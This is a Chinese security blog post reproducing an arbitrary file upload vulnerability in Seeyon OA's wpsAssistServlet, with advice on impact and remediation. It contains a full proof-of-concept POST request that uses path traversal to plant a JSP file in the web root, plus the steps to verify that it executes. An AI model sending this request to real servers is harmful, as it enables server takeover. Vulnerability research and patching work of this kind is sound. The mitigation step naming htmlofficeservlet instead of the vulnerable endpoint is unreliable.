文章总结： 致远OAwpsAssistServlet接口存在任意文件上传漏洞，攻击者可利用路径穿越将恶意JSP脚本上传至Web根目录并获Shell，影响A6/A8/A8N/G6/G6NV8.0SP2-V8.1SP1版本；官方已发补丁，需立即限制/seeyon/wpsAssistServlet访问、升级补丁并强化上传校验。 综合评分： 88 文章分类： 漏洞分析,WEB安全,漏洞POC,应急响应,安全建设

【漏洞复现】致远OA wpsAssistServlet 任意文件上传漏洞

原创

xuzhiyang xuzhiyang

玄武盾网络技术实验室

2026年1月16日 14:52 江西

*免责声明：本文仅供安全研究与学习之用，严禁使用本内容进行未经授权的违规渗透测试，遵守网络安全法，共同维护网络安全，违者后果自负。

每日学习资源分享：图形化未授权访问漏洞批量检测工具

更多资源请访问：www.xwdjs.ysepan.com

正文

在企业数字化办公进程中，OA 系统作为核心协同工具，其安全性直接关系到企业数据资产与业务运营的稳定。致远 OA 作为国内广泛应用的办公协同管理软件，近期被曝光存在一处高危任意文件上传漏洞，涉及 wpsAssistServlet 接口，攻击者可利用该漏洞上传恶意文件，进而获取服务器控制权，引发严重安全风险。

一、漏洞核心信息

#

（一）漏洞本质

致远 OA 的 wpsAssistServlet 接口在处理文件上传请求时，未对上传路径与文件类型进行严格校验，存在路径穿越漏洞。攻击者通过构造特殊请求包，可绕过系统限制，将恶意脚本文件上传至服务器任意可访问目录，且文件能被服务器成功解析执行。

（二）影响范围

经测试验证，以下致远 OA 版本均存在该漏洞：

• 致远 OA A6、A8、A8N（V8.0SP2、V8.1、V8.1SP1）
• 致远 OA G6、G6N（V8.1、V8.1SP1）使用上述版本的企业用户需高度警惕，及时开展安全排查。

二、漏洞复现过程

为帮助用户直观了解漏洞危害，以下为详细复现步骤（仅用于安全测试，严禁用于未授权攻击）：

1. 1、构造上传请求

   通过 POST 方法调用漏洞接口，在请求参数中指定穿越路径与恶意文件内容。请求包示例如下：

POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/test.jsp&fileId=2 HTTP/1.1Host: 目标服务器IPContent-Length: 349Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616bAccept-Encoding: gzip--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="upload"; filename="test.txt"Content-Type: application/vnd.ms-excel<% out.println("seeyon_vuln");%>--59229605f98b8cf290a7b8908b34616b--

3. 2、验证上传结果

   发送请求后，若服务器返回 HTTP/1.1 200 状态码，且响应数据中包含 “success:true” 字段，表明文件上传成功。

   

4. 3、访问恶意文件

   通过浏览器访问上传后的文件路径（http:// 目标服务器 IP/test.jsp），若页面显示 “seeyon_vuln” 内容，说明恶意脚本已被服务器成功解析，漏洞利用完成。

5. 

三、漏洞危害警示

#

该漏洞属于高危级别，一旦被攻击者利用，可能引发多重严重后果：

• 服务器被完全控制，攻击者可窃取企业内部文档、客户数据、财务信息等敏感内容；
• 恶意文件扩散导致内网病毒传播，影响整个办公网络的正常运行；
• 服务器被篡改页面、植入挖矿程序或沦为僵尸网络节点，造成企业声誉与经济损失。

四、安全防御方案

#

为有效防范该漏洞带来的风险，建议企业采取以下紧急修复与长期防御措施：

1. 1、紧急访问控制

   暂时限制对/seeyon/htmlofficeservlet路径的外部访问，可通过防火墙规则、服务器配置等方式实现，阻断漏洞利用入口。

2. 2、安装官方补丁

   致远 OA 官方已针对该漏洞发布专项修复补丁，企业应立即联系官方技术支持，根据自身 OA 版本下载并安装对应补丁，这是最根本的修复方式。

3. 3、加强文件上传校验

   在服务器端额外配置文件上传过滤规则，严格校验文件类型、后缀名与上传路径，禁止包含路径穿越字符（如 “../”）的请求。

4. 4、定期安全检测

   建立常态化 OA 系统安全扫描机制，定期使用专业安全工具检测漏洞，及时发现并处置潜在风险。

企业办公系统的安全防护需时刻保持警惕，此次致远 OA 漏洞提醒我们，及时更新补丁、强化访问控制、定期安全审计是保障系统安全的关键。建议相关企业尽快落实上述防御措施，避免因漏洞被利用造成不必要的损失。

随手点个「推荐」吧！别逼我求你！！！

声明：技术文章均收集于互联网，仅作为本人学习、记录使用。侵权删！！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：玄武盾网络技术实验室 xuzhiyang xuzhiyang《【漏洞复现】致远OA wpsAssistServlet 任意文件上传漏洞》